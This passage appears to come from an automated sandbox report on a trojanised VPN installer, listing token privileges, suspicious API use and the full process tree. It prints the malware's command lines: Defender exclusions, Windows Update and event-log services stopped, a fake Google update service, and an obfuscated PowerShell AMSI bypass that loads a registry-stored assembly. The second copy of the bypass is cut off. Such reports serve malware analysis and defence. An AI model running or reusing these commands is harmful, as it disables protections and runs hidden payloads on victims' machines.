| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\jgt.exe
"C:\Users\Admin\AppData\Local\Temp\jgt.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\Install(4).exe
"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp" /SL5="$901BE,103859173,936960,C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QPlaGzHWjLcR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BMXRzteBckOpTX,[Parameter(Position=1)][Type]$JXiAwYLqeX)$ZQmIRIErBvx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'al'+'e'+''+[Char](100)+''+','+'A'+'n'+''+'s'+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$ZQmIRIErBvx.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+'m'+''+[Char](101)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+'By'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$BMXRzteBckOpTX).SetImplementationFlags('R'+[Char](117)+'nti'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+'na'+'g'+'e'+[Char](100)+'');$ZQmIRIErBvx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+'H'+[Char](105)+''+'d'+'e'+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$JXiAwYLqeX,$BMXRzteBckOpTX).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+'ge'+[Char](100)+'');Write-Output $ZQmIRIErBvx.CreateType();}$hQGrnCdJuPRRg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cros'+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+'.'+[Char](85)+''+'n'+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+'ds');$mQNbVLcLjBmxyo=$hQGrnCdJuPRRg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+'r'+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TNcOBUIdmRFsSTinVUr=QPlaGzHWjLcR @([String])([IntPtr]);$zospZadJqnkWsEueYDLQvo=QPlaGzHWjLcR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MFEtruaBHQH=$hQGrnCdJuPRRg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'nd'+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+'l'+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LEOgUncfrZovMV=$mQNbVLcLjBmxyo.Invoke($Null,@([Object]$MFEtruaBHQH,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$mrUPbrlIgIhHbOhCm=$mQNbVLcLjBmxyo.Invoke($Null,@([Object]$MFEtruaBHQH,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$FKbeRAT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEOgUncfrZovMV,$TNcOBUIdmRFsSTinVUr).Invoke('a'+'m'+''+[Char](115)+'i'+[Char](46)+'d'+'l'+''+[Char](108)+'');$zpIZuOuqcTLrGSonr=$mQNbVLcLjBmxyo.Invoke($Null,@([Object]$FKbeRAT,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'Sc'+[Char](97)+''+'n'+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$RmipKWjnBT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mrUPbrlIgIhHbOhCm,$zospZadJqnkWsEueYDLQvo).Invoke($zpIZuOuqcTLrGSonr,[uint32]8,4,[ref]$RmipKWjnBT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zpIZuOuqcTLrGSonr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mrUPbrlIgIhHbOhCm,$zospZadJqnkWsEueYDLQvo).Invoke($zpIZuOuqcTLrGSonr,[uint32]8,0x20,[ref]$RmipKWjnBT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+''+[Char](87)+'A'+'R'+'E').GetValue(''+'d'+'ial'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QJOzQXTiFAdM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ruwEGUhqjZAFIF,[Parameter(Position=1)][Type]$QRZlvRhkQG)$yadUPoSZyqT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('My'+[Char](68)+''+[Char](101)+'leg'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+'las'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+'bl'+[Char](105)+'c,'+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$yadUPoSZyqT.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+'a'+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'Si'+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ruwEGUhqjZAFIF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+'ed');$yadUPoSZyqT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+'ig'+[Char](44)+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$QRZlvRhkQG,$ruwEGUhqjZAFIF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+'Ma'+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $yadUPoSZyqT.CreateType();}$sTQhbspeOWffW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+''+[Char](101)+'m'+'.'+'d'+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+'W'+'i'+'n32'+'.'+''+[Char](85)+'n'+'s'+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+'ti'+'v'+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$qqybKaIYIHQIQm=$sTQhbspeOWffW.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+'ro'+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+'a'+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vwtstPMcRClnUceIyst=QJOzQXTiFAdM @([String])([IntPtr]);$fFCsZzkQJPKvgRTLvVUyqg=QJOzQXTiFAdM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$itEwBtHWCDt=$sTQhbspeOWffW.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e'+'H'+'a'+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+'.d'+[Char](108)+''+'l'+'')));$XJEAwmdYEOoOTP=$qqybKaIYIHQIQm.Invoke($Null,@([Object]$itEwBtHWCDt,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+'ar'+[Char](121)+''+[Char](65)+'')));$AYIPxHKAnWFHgBBLn=$qqybKaIYIHQIQm.Invoke($Null,@([Object]$itEwBtHWCDt,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$pshzKNz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XJEAwmdYEOoO